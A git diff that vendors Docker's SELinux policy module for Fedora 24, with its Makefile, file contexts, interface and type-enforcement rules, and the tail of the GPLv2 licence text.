+INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
+OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
+TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
+YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
+PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
+POSSIBILITY OF SUCH DAMAGES.
+
+		     END OF TERMS AND CONDITIONS
+
+	    How to Apply These Terms to Your New Programs
+
+  If you develop a new program, and you want it to be of the greatest
+possible use to the public, the best way to achieve this is to make it
+free software which everyone can redistribute and change under these terms.
+
+  To do so, attach the following notices to the program.  It is safest
+to attach them to the start of each source file to most effectively
+convey the exclusion of warranty; and each file should have at least
+the "copyright" line and a pointer to where the full notice is found.
+
+    <one line to give the program's name and a brief idea of what it does.>
+    Copyright (C) <year>  <name of author>
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License along
+    with this program; if not, write to the Free Software Foundation, Inc.,
+    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+
+Also add information on how to contact you by electronic and paper mail.
+
+If the program is interactive, make it output a short notice like this
+when it starts in an interactive mode:
+
+    Gnomovision version 69, Copyright (C) year name of author
+    Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
+    This is free software, and you are welcome to redistribute it
+    under certain conditions; type `show c' for details.
+
+The hypothetical commands `show w' and `show c' should show the appropriate
+parts of the General Public License.  Of course, the commands you use may
+be called something other than `show w' and `show c'; they could even be
+mouse-clicks or menu items--whatever suits your program.
+
+You should also get your employer (if you work as a programmer) or your
+school, if any, to sign a "copyright disclaimer" for the program, if
+necessary.  Here is a sample; alter the names:
+
+  Yoyodyne, Inc., hereby disclaims all copyright interest in the program
+  `Gnomovision' (which makes passes at compilers) written by James Hacker.
+
+  <signature of Ty Coon>, 1 April 1989
+  Ty Coon, President of Vice
+
+This General Public License does not permit incorporating your program into
+proprietary programs.  If your program is a subroutine library, you may
+consider it more useful to permit linking proprietary applications with the
+library.  If this is what you want to do, use the GNU Lesser General
+Public License instead of this License.
diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/Makefile b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/Makefile
new file mode 100644
index 0000000000..16df33ef32
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/Makefile
@@ -0,0 +1,23 @@
+TARGETS?=docker
+MODULES?=${TARGETS:=.pp.bz2}
+SHAREDIR?=/usr/share
+
+all: ${TARGETS:=.pp.bz2}
+
+%.pp.bz2: %.pp
+	@echo Compressing $^ -\> $@
+	bzip2 -9 $^
+
+%.pp: %.te
+	make -f ${SHAREDIR}/selinux/devel/Makefile $@
+
+clean:
+	rm -f *~  *.tc *.pp *.pp.bz2
+	rm -rf tmp *.tar.gz
+
+man: install
+	sepolicy manpage --domain ${TARGETS}_t
+
+install:
+	semodule -i ${TARGETS}
+
diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/README.md b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/README.md
new file mode 100644
index 0000000000..7ea3117a89
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/README.md
@@ -0,0 +1 @@
+SELinux policy for docker
diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.fc b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.fc
new file mode 100644
index 0000000000..d6cb0e5792
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.fc
@@ -0,0 +1,29 @@
+/root/\.docker	gen_context(system_u:object_r:docker_home_t,s0)
+
+/usr/bin/docker			--	gen_context(system_u:object_r:docker_exec_t,s0)
+/usr/bin/docker-novolume-plugin		--	gen_context(system_u:object_r:docker_auth_exec_t,s0)
+/usr/lib/docker/docker-novolume-plugin	--	gen_context(system_u:object_r:docker_auth_exec_t,s0)
+
+/usr/lib/systemd/system/docker.service		--	gen_context(system_u:object_r:docker_unit_file_t,s0)
+/usr/lib/systemd/system/docker-novolume-plugin.service	--	gen_context(system_u:object_r:docker_unit_file_t,s0)
+
+/etc/docker(/.*)?		gen_context(system_u:object_r:docker_config_t,s0)
+
+/var/lib/docker(/.*)?		gen_context(system_u:object_r:docker_var_lib_t,s0)
+/var/lib/kublet(/.*)?		gen_context(system_u:object_r:docker_var_lib_t,s0)
+/var/lib/docker/vfs(/.*)?	gen_context(system_u:object_r:svirt_sandbox_file_t,s0)
+
+/var/run/docker(/.*)?		gen_context(system_u:object_r:docker_var_run_t,s0)
+/var/run/docker\.pid		--	gen_context(system_u:object_r:docker_var_run_t,s0)
+/var/run/docker\.sock		-s	gen_context(system_u:object_r:docker_var_run_t,s0)
+/var/run/docker-client(/.*)?		gen_context(system_u:object_r:docker_var_run_t,s0)
+/var/run/docker/plugins(/.*)?		gen_context(system_u:object_r:docker_plugin_var_run_t,s0)
+
+/var/lock/lxc(/.*)?		gen_context(system_u:object_r:docker_lock_t,s0)
+
+/var/log/lxc(/.*)?		gen_context(system_u:object_r:docker_log_t,s0)
+
+/var/lib/docker/init(/.*)?		gen_context(system_u:object_r:docker_share_t,s0)
+/var/lib/docker/containers/.*/hosts		gen_context(system_u:object_r:docker_share_t,s0)
+/var/lib/docker/containers/.*/hostname		gen_context(system_u:object_r:docker_share_t,s0)
+/var/lib/docker/.*/config\.env	gen_context(system_u:object_r:docker_share_t,s0)
diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.if b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.if
new file mode 100644
index 0000000000..e087e8b98b
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.if
@@ -0,0 +1,523 @@
+
+## <summary>The open-source application container engine.</summary>
+
+########################################
+## <summary>
+##	Execute docker in the docker domain.
+## </summary>
+## <param name="domain">
+## <summary>
+##	Domain allowed to transition.
+## </summary>
+## </param>
+#
+interface(`docker_domtrans',`
+	gen_require(`
+		type docker_t, docker_exec_t;
+	')
+
+	corecmd_search_bin($1)
+	domtrans_pattern($1, docker_exec_t, docker_t)
+')
+
+########################################
+## <summary>
+##	Execute docker in the caller domain.
+## </summary>
+## <param name="domain">
+## <summary>
+##	Domain allowed to transition.
+## </summary>
+## </param>
+#
+interface(`docker_exec',`
+	gen_require(`
+		type docker_exec_t;
+	')
+
+	corecmd_search_bin($1)
+	can_exec($1, docker_exec_t)
+')
+
+########################################
+## <summary>
+##	Search docker lib directories.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_search_lib',`
+	gen_require(`
+		type docker_var_lib_t;
+	')
+
+	allow $1 docker_var_lib_t:dir search_dir_perms;
+	files_search_var_lib($1)
+')
+
+########################################
+## <summary>
+##	Execute docker lib directories.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_exec_lib',`
+	gen_require(`
+		type docker_var_lib_t;
+	')
+
+	allow $1 docker_var_lib_t:dir search_dir_perms;
+	can_exec($1, docker_var_lib_t)
+')
+
+########################################
+## <summary>
+##	Read docker lib files.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_read_lib_files',`
+	gen_require(`
+		type docker_var_lib_t;
+	')
+
+	files_search_var_lib($1)
+	read_files_pattern($1, docker_var_lib_t, docker_var_lib_t)
+')
+
+########################################
+## <summary>
+##	Read docker share files.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_read_share_files',`
+	gen_require(`
+		type docker_share_t;
+	')
+
+	files_search_var_lib($1)
+	list_dirs_pattern($1, docker_share_t, docker_share_t)
+	read_files_pattern($1, docker_share_t, docker_share_t)
+	read_lnk_files_pattern($1, docker_share_t, docker_share_t)
+')
+
+######################################
+## <summary>
+##	Allow the specified domain to execute apache
+##	in the caller domain.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`apache_exec',`
+	gen_require(`
+		type httpd_exec_t;
+	')
+
+	can_exec($1, httpd_exec_t)
+')
+
+######################################
+## <summary>
+##	Allow the specified domain to execute docker shared files
+##	in the caller domain.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_exec_share_files',`
+	gen_require(`
+		type docker_share_t;
+	')
+
+	can_exec($1, docker_share_t)
+')
+
+########################################
+## <summary>
+##	Manage docker lib files.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_manage_lib_files',`
+	gen_require(`
+		type docker_var_lib_t;
+	')
+
+	files_search_var_lib($1)
+	manage_files_pattern($1, docker_var_lib_t, docker_var_lib_t)
+	manage_lnk_files_pattern($1, docker_var_lib_t, docker_var_lib_t)
+')
+
+########################################
+## <summary>
+##	Manage docker lib directories.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_manage_lib_dirs',`
+	gen_require(`
+		type docker_var_lib_t;
+	')
+
+	files_search_var_lib($1)
+	manage_dirs_pattern($1, docker_var_lib_t, docker_var_lib_t)
+')
+
+########################################
+## <summary>
+##	Create objects in a docker var lib directory
+##	with an automatic type transition to
+##	a specified private type.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+## <param name="private_type">
+##	<summary>
+##	The type of the object to create.
+##	</summary>
+## </param>
+## <param name="object_class">
+##	<summary>
+##	The class of the object to be created.
+##	</summary>
+## </param>
+## <param name="name" optional="true">
+##	<summary>
+##	The name of the object being created.
+##	</summary>
+## </param>
+#
+interface(`docker_lib_filetrans',`
+	gen_require(`
+		type docker_var_lib_t;
+	')
+
+	filetrans_pattern($1, docker_var_lib_t, $2, $3, $4)
+')
+
+########################################
+## <summary>
+##	Read docker PID files.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_read_pid_files',`
+	gen_require(`
+		type docker_var_run_t;
+	')
+
+	files_search_pids($1)
+	read_files_pattern($1, docker_var_run_t, docker_var_run_t)
+')
+
+########################################
+## <summary>
+##	Execute docker server in the docker domain.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed to transition.
+##	</summary>
+## </param>
+#
+interface(`docker_systemctl',`
+	gen_require(`
+		type docker_t;
+		type docker_unit_file_t;
+	')
+
+	systemd_exec_systemctl($1)
+	init_reload_services($1)
+        systemd_read_fifo_file_passwd_run($1)
+	allow $1 docker_unit_file_t:file read_file_perms;
+	allow $1 docker_unit_file_t:service manage_service_perms;
+
+	ps_process_pattern($1, docker_t)
+')
+
+########################################
+## <summary>
+##	Read and write docker shared memory.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_rw_sem',`
+	gen_require(`
+		type docker_t;
+	')
+
+	allow $1 docker_t:sem rw_sem_perms;
+')
+
+#######################################
+## <summary>
+##  Read and write the docker pty type.
+## </summary>
+## <param name="domain">
+##  <summary>
+##  Domain allowed access.
+##  </summary>
+## </param>
+#
+interface(`docker_use_ptys',`
+    gen_require(`
+        type docker_devpts_t;
+    ')
+
+    allow $1 docker_devpts_t:chr_file rw_term_perms;
+')
+
+#######################################
+## <summary>
+##      Allow domain to create docker content
+## </summary>
+## <param name="domain">
+##      <summary>
+##      Domain allowed access.
+##      </summary>
+## </param>
+#
+interface(`docker_filetrans_named_content',`
+
+    gen_require(`
+        type docker_var_lib_t;
+        type docker_share_t;
+    	type docker_log_t;
+	    type docker_var_run_t;
+        type docker_home_t;
+    ')
+
+    files_pid_filetrans($1, docker_var_run_t, file, "docker.pid")
+    files_pid_filetrans($1, docker_var_run_t, sock_file, "docker.sock")
+    files_pid_filetrans($1, docker_var_run_t, dir, "docker-client")
+    logging_log_filetrans($1, docker_log_t, dir, "lxc")
+    files_var_lib_filetrans($1, docker_var_lib_t, dir, "docker")
+    filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "config.env")
+    filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hosts")
+    filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hostname")
+    filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "resolv.conf")
+    filetrans_pattern($1, docker_var_lib_t, docker_share_t, dir, "init")
+    userdom_admin_home_dir_filetrans($1, docker_home_t, dir, ".docker")
+')
+
+########################################
+## <summary>
+##	Connect to docker over a unix stream socket.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_stream_connect',`
+	gen_require(`
+		type docker_t, docker_var_run_t;
+	')
+
+	files_search_pids($1)
+	stream_connect_pattern($1, docker_var_run_t, docker_var_run_t, docker_t)
+')
+
+########################################
+## <summary>
+##	Connect to SPC containers over a unix stream socket.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_spc_stream_connect',`
+	gen_require(`
+		type spc_t, spc_var_run_t;
+	')
+
+	files_search_pids($1)
+	files_write_all_pid_sockets($1)
+	allow $1 spc_t:unix_stream_socket connectto;
+')
+
+########################################
+## <summary>
+##	All of the rules required to administrate
+##	an docker environment
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_admin',`
+	gen_require(`
+		type docker_t;
+		type docker_var_lib_t, docker_var_run_t;
+		type docker_unit_file_t;
+		type docker_lock_t;
+		type docker_log_t;
+		type docker_config_t;
+	')
+
+	allow $1 docker_t:process { ptrace signal_perms };
+	ps_process_pattern($1, docker_t)
+
+	admin_pattern($1, docker_config_t)
+
+	files_search_var_lib($1)
+	admin_pattern($1, docker_var_lib_t)
+
+	files_search_pids($1)
+	admin_pattern($1, docker_var_run_t)
+
+	files_search_locks($1)
+	admin_pattern($1, docker_lock_t)
+
+	logging_search_logs($1)
+	admin_pattern($1, docker_log_t)
+
+	docker_systemctl($1)
+	admin_pattern($1, docker_unit_file_t)
+	allow $1 docker_unit_file_t:service all_service_perms;
+
+	optional_policy(`
+		systemd_passwd_agent_exec($1)
+		systemd_read_fifo_file_passwd_run($1)
+	')
+')
+
+########################################
+## <summary>
+##	Execute docker_auth_exec_t in the docker_auth domain.
+## </summary>
+## <param name="domain">
+## <summary>
+##	Domain allowed to transition.
+## </summary>
+## </param>
+#
+interface(`docker_auth_domtrans',`
+	gen_require(`
+		type docker_auth_t, docker_auth_exec_t;
+	')
+
+	corecmd_search_bin($1)
+	domtrans_pattern($1, docker_auth_exec_t, docker_auth_t)
+')
+
+######################################
+## <summary>
+##	Execute docker_auth in the caller domain.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_auth_exec',`
+	gen_require(`
+		type docker_auth_exec_t;
+	')
+
+	corecmd_search_bin($1)
+	can_exec($1, docker_auth_exec_t)
+')
+
+########################################
+## <summary>
+##	Connect to docker_auth over a unix stream socket.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_auth_stream_connect',`
+	gen_require(`
+		type docker_auth_t, docker_plugin_var_run_t;
+	')
+
+	files_search_pids($1)
+	stream_connect_pattern($1, docker_plugin_var_run_t, docker_plugin_var_run_t, docker_auth_t)
+')
+
+########################################
+## <summary>
+##	docker domain typebounds calling domain.
+## </summary>
+## <param name="domain">
+## <summary>
+##	Domain to be typebound.
+## </summary>
+## </param>
+#
+interface(`docker_typebounds',`
+	gen_require(`
+		type docker_t;
+	')
+
+	typebounds docker_t $1;
+')
+
+########################################
+## <summary>
+##	Allow any docker_exec_t to be an entrypoint of this domain
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+## <rolecap/>
+#
+interface(`docker_entrypoint',`
+	gen_require(`
+		type docker_exec_t;
+	')
+	allow $1 docker_exec_t:file entrypoint;
+')
diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.te b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.te
new file mode 100644
index 0000000000..4231688382
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.te
@@ -0,0 +1,399 @@
+policy_module(docker, 1.0.0)
+
+########################################
+#
+# Declarations
+#
+
+## <desc>
+##  <p>
+##  Determine whether docker can
+##  connect to all TCP ports.
+##  </p>
+## </desc>
+gen_tunable(docker_connect_any, false)
+
+type docker_t;
+type docker_exec_t;
+init_daemon_domain(docker_t, docker_exec_t)
+domain_subj_id_change_exemption(docker_t)
+domain_role_change_exemption(docker_t)
+
+type spc_t;
+domain_type(spc_t)
+role system_r types spc_t;
+
+type docker_auth_t;
+type docker_auth_exec_t;
+init_daemon_domain(docker_auth_t, docker_auth_exec_t)
+
+type spc_var_run_t;
+files_pid_file(spc_var_run_t)
+
+type docker_var_lib_t;
+files_type(docker_var_lib_t)
+
+type docker_home_t;
+userdom_user_home_content(docker_home_t)
+
+type docker_config_t;
+files_config_file(docker_config_t)
+
+type docker_lock_t;
+files_lock_file(docker_lock_t)
+
+type docker_log_t;
+logging_log_file(docker_log_t)
+
+type docker_tmp_t;
+files_tmp_file(docker_tmp_t)
+
+type docker_tmpfs_t;
+files_tmpfs_file(docker_tmpfs_t)
+
+type docker_var_run_t;
+files_pid_file(docker_var_run_t)
+
+type docker_plugin_var_run_t;
+files_pid_file(docker_plugin_var_run_t)
+
+type docker_unit_file_t;
+systemd_unit_file(docker_unit_file_t)
+
+type docker_devpts_t;
+term_pty(docker_devpts_t)
+
+type docker_share_t;
+files_type(docker_share_t)
+
+########################################
+#
+# docker local policy
+#
+allow docker_t self:capability { chown kill fowner fsetid mknod net_admin net_bind_service net_raw setfcap };
+allow docker_t self:tun_socket relabelto;
+allow docker_t self:process { getattr signal_perms setrlimit setfscreate };
+allow docker_t self:fifo_file rw_fifo_file_perms;
+allow docker_t self:unix_stream_socket create_stream_socket_perms;
+allow docker_t self:tcp_socket create_stream_socket_perms;
+allow docker_t self:udp_socket create_socket_perms;
+allow docker_t self:capability2 block_suspend;
+
+docker_auth_stream_connect(docker_t)
+
+manage_files_pattern(docker_t, docker_home_t, docker_home_t)
+manage_dirs_pattern(docker_t, docker_home_t, docker_home_t)
+manage_lnk_files_pattern(docker_t, docker_home_t, docker_home_t)
+userdom_admin_home_dir_filetrans(docker_t, docker_home_t, dir, ".docker")
+
+manage_dirs_pattern(docker_t, docker_config_t, docker_config_t)
+manage_files_pattern(docker_t, docker_config_t, docker_config_t)
+files_etc_filetrans(docker_t, docker_config_t, dir, "docker")
+
+manage_dirs_pattern(docker_t, docker_lock_t, docker_lock_t)
+manage_files_pattern(docker_t, docker_lock_t, docker_lock_t)
+files_lock_filetrans(docker_t, docker_lock_t, { dir file }, "lxc")
+
+manage_dirs_pattern(docker_t, docker_log_t, docker_log_t)
+manage_files_pattern(docker_t, docker_log_t, docker_log_t)
+manage_lnk_files_pattern(docker_t, docker_log_t, docker_log_t)
+logging_log_filetrans(docker_t, docker_log_t, { dir file lnk_file })
+allow docker_t docker_log_t:dir_file_class_set { relabelfrom relabelto };
+
+manage_dirs_pattern(docker_t, docker_tmp_t, docker_tmp_t)
+manage_files_pattern(docker_t, docker_tmp_t, docker_tmp_t)
+manage_lnk_files_pattern(docker_t, docker_tmp_t, docker_tmp_t)
+files_tmp_filetrans(docker_t, docker_tmp_t, { dir file lnk_file })
+
+manage_dirs_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
+manage_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
+manage_lnk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
+manage_fifo_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
+manage_chr_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
+manage_blk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
+allow docker_t docker_tmpfs_t:dir relabelfrom;
+can_exec(docker_t, docker_tmpfs_t)
+fs_tmpfs_filetrans(docker_t, docker_tmpfs_t, { dir file })
+allow docker_t docker_tmpfs_t:chr_file mounton;
+
+manage_dirs_pattern(docker_t, docker_share_t, docker_share_t)
+manage_files_pattern(docker_t, docker_share_t, docker_share_t)
+manage_lnk_files_pattern(docker_t, docker_share_t, docker_share_t)
+allow docker_t docker_share_t:dir_file_class_set { relabelfrom relabelto };
+
+can_exec(docker_t, docker_share_t)
+#docker_filetrans_named_content(docker_t)
+
+manage_dirs_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
+manage_chr_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
+manage_blk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
+manage_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
+manage_lnk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
+allow docker_t docker_var_lib_t:dir_file_class_set { relabelfrom relabelto };
+files_var_lib_filetrans(docker_t, docker_var_lib_t, { dir file lnk_file })
+
+manage_dirs_pattern(docker_t, docker_var_run_t, docker_var_run_t)
+manage_files_pattern(docker_t, docker_var_run_t, docker_var_run_t)
+manage_sock_files_pattern(docker_t, docker_var_run_t, docker_var_run_t)
+manage_lnk_files_pattern(docker_t, docker_var_run_t, docker_var_run_t)
+files_pid_filetrans(docker_t, docker_var_run_t, { dir file lnk_file sock_file })
+
+allow docker_t docker_devpts_t:chr_file { relabelfrom rw_chr_file_perms setattr_chr_file_perms };
+term_create_pty(docker_t, docker_devpts_t)
+
+kernel_read_system_state(docker_t)
+kernel_read_network_state(docker_t)
+kernel_read_all_sysctls(docker_t)
+kernel_rw_net_sysctls(docker_t)
+kernel_setsched(docker_t)
+kernel_read_all_proc(docker_t)
+
+domain_use_interactive_fds(docker_t)
+domain_dontaudit_read_all_domains_state(docker_t)
+
+corecmd_exec_bin(docker_t)
+corecmd_exec_shell(docker_t)
+
+corenet_tcp_bind_generic_node(docker_t)
+corenet_tcp_sendrecv_generic_if(docker_t)
+corenet_tcp_sendrecv_generic_node(docker_t)
+corenet_tcp_sendrecv_generic_port(docker_t)
+corenet_tcp_bind_all_ports(docker_t)
+corenet_tcp_connect_http_port(docker_t)
+corenet_tcp_connect_commplex_main_port(docker_t)
+corenet_udp_sendrecv_generic_if(docker_t)
+corenet_udp_sendrecv_generic_node(docker_t)
+corenet_udp_sendrecv_all_ports(docker_t)
+corenet_udp_bind_generic_node(docker_t)
+corenet_udp_bind_all_ports(docker_t)
+
+files_read_config_files(docker_t)
+files_dontaudit_getattr_all_dirs(docker_t)
+files_dontaudit_getattr_all_files(docker_t)
+
+fs_read_cgroup_files(docker_t)
+fs_read_tmpfs_symlinks(docker_t)
+fs_search_all(docker_t)
+fs_getattr_all_fs(docker_t)
+
+storage_raw_rw_fixed_disk(docker_t)
+
+auth_use_nsswitch(docker_t)
+auth_dontaudit_getattr_shadow(docker_t)
+
+init_read_state(docker_t)
+init_status(docker_t)
+
+logging_send_audit_msgs(docker_t)
+logging_send_syslog_msg(docker_t)
+
+miscfiles_read_localization(docker_t)
+
+mount_domtrans(docker_t)
+
+seutil_read_default_contexts(docker_t)
+seutil_read_config(docker_t)
+
+sysnet_dns_name_resolve(docker_t)
+sysnet_exec_ifconfig(docker_t)
+
+optional_policy(`
+	rpm_exec(docker_t)
+	rpm_read_db(docker_t)
+	rpm_exec(docker_t)
+')
+
+optional_policy(`
+	fstools_domtrans(docker_t)
+')
+
+optional_policy(`
+	iptables_domtrans(docker_t)
+')
+
+optional_policy(`
+	openvswitch_stream_connect(docker_t)
+')
+
+#
+# lxc rules
+#
+
+allow docker_t self:capability { dac_override setgid setpcap setuid sys_admin sys_boot sys_chroot sys_ptrace };
+
+allow docker_t self:process { getcap setcap setexec setpgid setsched signal_perms };
+
+allow docker_t self:netlink_route_socket rw_netlink_socket_perms;;
+allow docker_t self:netlink_audit_socket create_netlink_socket_perms;
+allow docker_t self:unix_dgram_socket { create_socket_perms sendto };
+allow docker_t self:unix_stream_socket { create_stream_socket_perms connectto };
+
+allow docker_t docker_var_lib_t:dir mounton;
+allow docker_t docker_var_lib_t:chr_file mounton;
+can_exec(docker_t, docker_var_lib_t)
+
+kernel_dontaudit_setsched(docker_t)
+kernel_get_sysvipc_info(docker_t)
+kernel_request_load_module(docker_t)
+kernel_mounton_messages(docker_t)
+kernel_mounton_all_proc(docker_t)
+kernel_mounton_all_sysctls(docker_t)
+kernel_unlabeled_entry_type(spc_t)
+kernel_unlabeled_domtrans(docker_t, spc_t)
+
+dev_getattr_all(docker_t)
+dev_getattr_sysfs_fs(docker_t)
+dev_read_urand(docker_t)
+dev_read_lvm_control(docker_t)
+dev_rw_sysfs(docker_t)
+dev_rw_loop_control(docker_t)
+dev_rw_lvm_control(docker_t)
+
+files_getattr_isid_type_dirs(docker_t)
+files_manage_isid_type_dirs(docker_t)
+files_manage_isid_type_files(docker_t)
+files_manage_isid_type_symlinks(docker_t)
+files_manage_isid_type_chr_files(docker_t)
+files_manage_isid_type_blk_files(docker_t)
+files_exec_isid_files(docker_t)
+files_mounton_isid(docker_t)
+files_mounton_non_security(docker_t)
+files_mounton_isid_type_chr_file(docker_t)
+
+fs_mount_all_fs(docker_t)
+fs_unmount_all_fs(docker_t)
+fs_remount_all_fs(docker_t)
+files_mounton_isid(docker_t)
+fs_manage_cgroup_dirs(docker_t)
+fs_manage_cgroup_files(docker_t)
+fs_relabelfrom_xattr_fs(docker_t)
+fs_relabelfrom_tmpfs(docker_t)
+fs_read_tmpfs_symlinks(docker_t)
+fs_list_hugetlbfs(docker_t)
+
+term_use_generic_ptys(docker_t)
+term_use_ptmx(docker_t)
+term_getattr_pty_fs(docker_t)
+term_relabel_pty_fs(docker_t)
+term_mounton_unallocated_ttys(docker_t)
+
+modutils_domtrans_insmod(docker_t)
+
+systemd_status_all_unit_files(docker_t)
+systemd_start_systemd_services(docker_t)
+
+userdom_stream_connect(docker_t)
+userdom_search_user_home_content(docker_t)
+userdom_read_all_users_state(docker_t)
+userdom_relabel_user_home_files(docker_t)
+userdom_relabel_user_tmp_files(docker_t)
+userdom_relabel_user_tmp_dirs(docker_t)
+
+optional_policy(`
+	gpm_getattr_gpmctl(docker_t)
+')
+
+optional_policy(`
+	dbus_system_bus_client(docker_t)
+	init_dbus_chat(docker_t)
+	init_start_transient_unit(docker_t)
+
+	optional_policy(`
+		systemd_dbus_chat_logind(docker_t)
+		systemd_dbus_chat_machined(docker_t)
+	')
+
+	optional_policy(`
+		firewalld_dbus_chat(docker_t)
+	')
+')
+
+optional_policy(`
+	udev_read_db(docker_t)
+')
+
+optional_policy(`
+	unconfined_domain(docker_t)
+	unconfined_typebounds(docker_t)
+')
+
+optional_policy(`
+	virt_read_config(docker_t)
+	virt_exec(docker_t)
+	virt_stream_connect(docker_t)
+	virt_stream_connect_sandbox(docker_t)
+	virt_exec_sandbox_files(docker_t)
+	virt_manage_sandbox_files(docker_t)
+	virt_relabel_sandbox_filesystem(docker_t)
+	# for lxc
+	virt_transition_svirt_sandbox(docker_t, system_r)
+	virt_mounton_sandbox_file(docker_t)
+#	virt_attach_sandbox_tun_iface(docker_t)
+	allow docker_t svirt_sandbox_domain:tun_socket relabelfrom;
+	virt_sandbox_entrypoint(docker_t)	
+')
+
+tunable_policy(`docker_connect_any',`
+    corenet_tcp_connect_all_ports(docker_t)
+    corenet_sendrecv_all_packets(docker_t)
+    corenet_tcp_sendrecv_all_ports(docker_t)
+')
+
+########################################
+#
+# spc local policy
+#
+allow spc_t { docker_var_lib_t docker_share_t }:file entrypoint;
+role system_r types spc_t;
+
+domtrans_pattern(docker_t, docker_share_t, spc_t)
+domtrans_pattern(docker_t, docker_var_lib_t, spc_t)
+allow docker_t spc_t:process { setsched signal_perms };
+ps_process_pattern(docker_t, spc_t)
+allow docker_t spc_t:socket_class_set { relabelto relabelfrom };
+filetrans_pattern(docker_t, docker_var_lib_t, docker_share_t, dir, "overlay")
+
+optional_policy(`
+	systemd_dbus_chat_machined(spc_t)
+')
+
+optional_policy(`
+	dbus_chat_system_bus(spc_t)
+')
+
+optional_policy(`
+	unconfined_domain_noaudit(spc_t)
+')
+
+optional_policy(`
+	virt_transition_svirt_sandbox(spc_t, system_r)
+	virt_sandbox_entrypoint(spc_t)	
+')
+
+########################################
+#
+# docker_auth local policy
+#
+allow docker_auth_t self:fifo_file rw_fifo_file_perms;
+allow docker_auth_t self:unix_stream_socket create_stream_socket_perms;
+dontaudit docker_auth_t self:capability net_admin;
+
+docker_stream_connect(docker_auth_t)
+
